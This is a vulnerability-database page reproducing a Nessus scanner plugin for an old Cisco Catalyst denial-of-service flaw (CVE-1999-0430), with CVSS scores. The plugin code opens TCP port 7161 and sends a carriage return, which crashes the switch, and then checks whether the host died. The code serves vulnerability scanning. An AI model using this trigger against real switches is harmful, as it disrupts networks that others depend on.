Lucene search

K
nessusThis script is Copyright (C) 1999-2018 Tenable Network Security, Inc.CISCO_DOS.NASL
HistoryJun 22, 1999 - 12:00 a.m.

Cisco Catalyst Supervisor Remote Reload DoS

1999-06-2200:00:00
This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.
www.tenable.com
10

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

0.002 Low

EPSS

Percentile

59.2%

The remote host appears to be a Cisco Catalyst switch. This device runs an undocumented TCP service. Sending a carriage return to this port causes the switch to immediately reset. A remote attacker could repeatedly exploit this to disable the switch.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(10046);
 script_version("1.38");
 script_cvs_date("Date: 2018/11/15 20:50:20");

 script_cve_id("CVE-1999-0430");
 script_bugtraq_id(705);

 script_name(english:"Cisco Catalyst Supervisor Remote Reload DoS");
 script_summary(english:"Crashes a Cisco switch");

 script_set_attribute(attribute:"synopsis", value:"The remote switch has a denial of service vulnerability.");
 script_set_attribute(attribute:"description", value:
"The remote host appears to be a Cisco Catalyst switch. This device
runs an undocumented TCP service. Sending a carriage return to this
port causes the switch to immediately reset. A remote attacker could
repeatedly exploit this to disable the switch.");
 # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-19990324-cat7161
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?05a35db9");
 # https://web.archive.org/web/20020208163146/http://archives.neohapsis.com/archives/bugtraq/1999_1/1077.html
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?90539b62");
 script_set_attribute(attribute:"solution", value:"Apply the fix referenced in the vendor's advisory.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"vuln_publication_date", value:"1999/03/24");
 script_set_attribute(attribute:"patch_publication_date", value:"1999/03/24");
 script_set_attribute(attribute:"plugin_publication_date", value:"1999/06/22");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:cisco:catalyst_12xx_supervisor_software");
 script_end_attributes();

 script_category(ACT_KILL_HOST);
 script_family(english:"CISCO");

 script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");

 script_require_keys("Settings/ParanoidReport");
 script_require_ports(7161);

 exit(0);
}

include("audit.inc");
include("global_settings.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

if(get_port_state(7161))
{
 soc = open_sock_tcp(7161);
 if(soc)
 {
  start_denial();
  data = raw_string(13);
  send(socket:soc, data:data);
  sleep(5);
  alive = end_denial();
   if(!alive){
  		security_hole(7161);
		set_kb_item(name:"Host/dead", value:TRUE);
		}
 }
}

VendorProductVersionCPE
ciscocatalyst_12xx_supervisor_softwarecpe:/a:cisco:catalyst_12xx_supervisor_software

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

0.002 Low

EPSS

Percentile

59.2%

Related for CISCO_DOS.NASL